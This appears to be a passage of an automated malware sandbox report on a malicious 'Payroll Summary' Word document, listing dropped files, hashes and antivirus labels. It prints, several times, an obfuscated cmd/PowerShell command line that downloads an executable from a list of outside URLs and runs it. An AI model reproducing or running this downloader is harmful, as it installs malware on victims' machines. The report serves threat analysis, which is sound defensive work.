19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
Ansi based on Process Commandline
(cmd.exe)
Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %comSpEc% %comSpEc% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=ow&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=er&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
Ansi based on Process Commandline
(00010503-00004016)
powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
Ansi based on Process Commandline
(powershell.exe)
Extracted Files
-
Malicious 1
-
-
57463.exe
- Size
- 232KiB (237568 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "GenKryptik.BMLF" (14/64)
- Runtime Process
- 57463.exe (PID: 3220)
- MD5
-
35832c2b7c2287d532ee0e0abc1ae5f1
- SHA1
-
253685c4375976ff4b31e5112c82272037ab42e3
- SHA256
-
ef7f7e9aef5a6bc1e5b0a3bf476dae6cb2ef48cae4283597c4b5d30ef7fdd8a5
-
-
Clean 1
-
-
~WRD0002.tmp
- Size
- 5.5KiB (5632 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Cannot read section info
- AV Scan Result
- 0/58
- MD5
-
0f570f748eeacf89941ee8a9fb47cd63
- SHA1
-
06465dd291b931826588f00a6ad8ffd4c3b213d2
- SHA256
-
e1f37d99490cd216b2fc6fdd9a161b1fa63273f7d0a14de4fff287d8286ca2b0
-
-
Informative 9
-
-
09172 Payroll Summary.LNK
- Size
- 518B (518 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu May 17 20:52:27 2018, mtime=Thu May 17 20:52:27 2018, atime=Thu May 17 20:52:42 2018, length=167424, window=hide
- Runtime Process
- WINWORD.EXE (PID: 2508)
- MD5
-
b11404498d8c89426a4a5d85bd243370
- SHA1
-
9756b01402e7f458601fd3c68dc19883817c48b9
- SHA256
-
92228da4fe863673ee0bead122b43f48c9f18ffa128c3dd10eca1035d03ef54a
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2508)
- MD5
-
6e2a1743a37219f4d509c4059614cba9
- SHA1
-
97ef035ed407cd69a19d749dd58d8cbc73dcda5c
- SHA256
-
6051e171b7617fc5e1cb68bcff6b5a2681ed039120209907cf9c947f9b5c08ec
-
QR3RTP9CEYNQI3ODIF1G.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 2408)
- MD5
-
15ddb3d8662ed7e21c594031682e7b68
- SHA1
-
53b2df953fcac08e6f88a3c92bc02d0401b63a7a
- SHA256
-
4ca7f90985dc96207c7fc8e2be92ef8ebd23e636f44946edd717b0df3cf0a4f3
-
~WRD0000.tmp
- Size
- 44KiB (45056 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Ryfewujashowavae46504, Subject: Ryfewujasho58022, Author: Ryfewuja84323, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 17 19:45:00 2018, Last Saved Time/Date: Thu May 17 19:45:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 5, Security: 0
- Runtime Process
- WINWORD.EXE (PID: 2508)
- MD5
-
436c44134019873484df35e2873944f8
- SHA1
-
fb1b95465e7f077dacc790b9930981192831402c
- SHA256
-
0e19cfa277b1a1800e05b2c7e508fec3dd69fc57bc8a7a0bdf940385e613c5cd
-
index.dat
- Size
- 171B (171 bytes)
- Type
- data
- Runtime Process
- cmnmspthrd.exe (PID: 2240)
- MD5
-
b31d5d974bf1e459d31dd1a0e7b4f505
- SHA1
-
6fa91f0e73c9f3c996e382882d04383e73378b28
- SHA256
-
2648f11bf17ec2ba950912a455b0712d912329952e614bd00d88dc5505136072
-
~WRS{84ED4C61-472A-4119-8DE6-9124328149A8}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2508)
- MD5
-
5d4d94ee7e06bbb0af9584119797b23a
- SHA1
-
dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
-
4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
~$172 Payroll Summary.doc
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2508)
- MD5
-
6e2a1743a37219f4d509c4059614cba9
- SHA1
-
97ef035ed407cd69a19d749dd58d8cbc73dcda5c
- SHA256
-
6051e171b7617fc5e1cb68bcff6b5a2681ed039120209907cf9c947f9b5c08ec
-
09172%20Payroll%20Summary.doc.lnk
- Size
- 594B (594 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Thu May 17 20:52:27 2018, mtime=Thu May 17 20:52:27 2018, atime=Thu May 17 20:52:42 2018, length=167424, window=hide
- MD5
-
bf579ab8e8675febda19a41a128a8d0a
- SHA1
-
97f6969780b8d5cc608b4a56ae7328d0f6a11c9d
- SHA256
-
1f3ebc3cda7497e3df71182a5e07214863d88c8a7cbbf01d7246692dbcbde717
-
~WRD0003.tmp
- Size
- 44KiB (45056 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Ryfewujashowavae46504, Subject: Ryfewujasho58022, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 17 19:45:00 2018, Last Saved Time/Date: Thu May 17 23:07:00 2018, Number of Pages: 1, Number of Words: 1, Number of Characters: 7, Security: 0
- MD5
-
a62259ab4dfb5ac263d60e550581f015
- SHA1
-
e3aa842383e704aeeb2bbe95d0294ca7838ddc8b
- SHA256
-
46f66f061d1c6eb59c09c2e5b5e0afba7a44dd54c1ddfff51ab9f3863fe9ea8a
-
Notifications
-
Runtime
- Added comment to Virus Total report
- Extracted file "~$172 Payroll Summary.doc" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/6051e171b7617fc5e1cb68bcff6b5a2681ed039120209907cf9c947f9b5c08ec/analysis/1526565676/")
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "api-70" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report
Community
There are no community comments.
You must be logged in to submit a comment.